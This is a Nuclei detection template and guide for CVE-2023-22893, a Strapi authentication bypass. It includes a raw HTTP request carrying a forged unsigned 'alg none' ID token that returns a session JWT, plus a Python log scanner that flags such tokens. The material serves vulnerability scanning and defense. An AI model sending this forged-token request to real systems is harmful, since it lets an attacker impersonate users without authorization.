Strapi Versions <=4.5.6 - Authentication Bypass
ID: CVE-2023-22893
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,strapi,authenticated,aws,cognito
Description
Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token whose header declares the ‘none’ signing algorithm (so it carries no signature at all) to bypass authentication and impersonate any user that authenticates through AWS Cognito.
YAML Source
id: CVE-2023-22893

info:
  name: Strapi Versions <=4.5.6 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
  reference:
    - https://www.ghostccamm.com/blog/multi_strapi_vulns
    - https://github.com/strapi/strapi/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22893
    cwe-id: CWE-287
    epss-score: 0.00337
    epss-percentile: 0.71798
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: strapi
    product: strapi
    fofa-query: app="strapi-Headless-CMS"
  tags: cve,cve2023,strapi,authenticated,aws,cognito

variables:
  email: "{{email}}"
  payload: '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'

http:
  - raw:
      - |
        GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"provider":'
          - '"confirmed":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".jwt"
# digest: 4a0a0047304502201e60487ff4c4d30e77cd927999f0ebb9eb7a5e0065bd6be1e7c6778d8777f580022100ab763ac01d0e29b4b0f3cac1bd73e0b0ecf1988e5c13a5f1d002fce2c553cc59:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability described above by sending the crafted callback request and matching on the authenticated JSON response. Run it with the Nuclei tool against the target URL:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22893.yaml"
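As an added defender-side example (not part of the template, of Nuclei or of Strapi's own code), the following Python scans web-server access-log lines for the callback request shape the template above sends and flags id_token values whose header declares alg none, an algorithm outside an allowlist, or an empty signature segment; the log lines, client IPs and the RS256 allowlist are constructed assumptions.

```python
import base64
import json
import re
from urllib.parse import parse_qs, urlparse

ALLOWED_ALGS = {"RS256"}  # assumption: Cognito-issued ID tokens are RS256-signed
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))
def classify_id_token(token: str) -> "str | None":
    """Reason to reject the token before any signature check, or None if it may proceed."""
    parts = token.split(".")
    if len(parts) != 3:
        return "malformed token (expected header.payload.signature)"
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:  # bad base64 or bad JSON in the header
        return "undecodable header"
    alg = header.get("alg")
    if isinstance(alg, str) and alg.lower() == "none":
        return "alg=none header"
    if not isinstance(alg, str) or alg not in ALLOWED_ALGS:
        return f"unexpected alg {alg!r}"
    if parts[2] == "":
        return "empty signature segment"
    return None  # a real verifier must still check the signature against the provider's JWKS
def find_suspicious_callbacks(log_text: str) -> "list[tuple[str, str]]":
    """Flag Cognito callback requests whose id_token fails the header checks: (client_ip, reason)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        url = urlparse(m.group(1)) if m else None
        if url is None or not url.path.endswith("/auth/cognito/callback"):
            continue
        for token in parse_qs(url.query).get("id_token", []):
            reason = classify_id_token(token)
            if reason:
                hits.append((line.split(" ", 1)[0], reason))
    return hits
def _b64url(obj: dict) -> str:  # only used to build the constructed sample tokens below
    return base64.urlsafe_b64encode(json.dumps(obj, separators=(",", ":")).encode()).rstrip(b"=").decode()
# Constructed sample access-log lines (not real data): a forged alg=none token shaped like the template's,
# a signed-looking RS256 token, and an unrelated request that must be ignored.
FORGED = f"{_b64url({'alg': 'none', 'typ': 'JWT'})}.{_b64url({'cognito:username': 'abc', 'email': 'admin@example.com'})}."
SIGNED = f"{_b64url({'alg': 'RS256', 'typ': 'JWT'})}.{_b64url({'email': 'user@example.com'})}.c2ln"
SAMPLE_LOG = (f'203.0.113.7 - - [12/Jan/2023:10:00:01 +0000] "GET /api/auth/cognito/callback?access_token=abcdefgh&id_token={FORGED} HTTP/1.1" 200 512\n'
              f'198.51.100.2 - - [12/Jan/2023:10:00:02 +0000] "GET /api/auth/cognito/callback?access_token=xyz&id_token={SIGNED} HTTP/1.1" 200 512\n'
              '198.51.100.3 - - [12/Jan/2023:10:00:03 +0000] "GET /api/users/me HTTP/1.1" 200 100')
```

A None result from classify_id_token only means the header passed the pre-checks; the token still has to be verified against the identity provider's published signing keys before it is trusted.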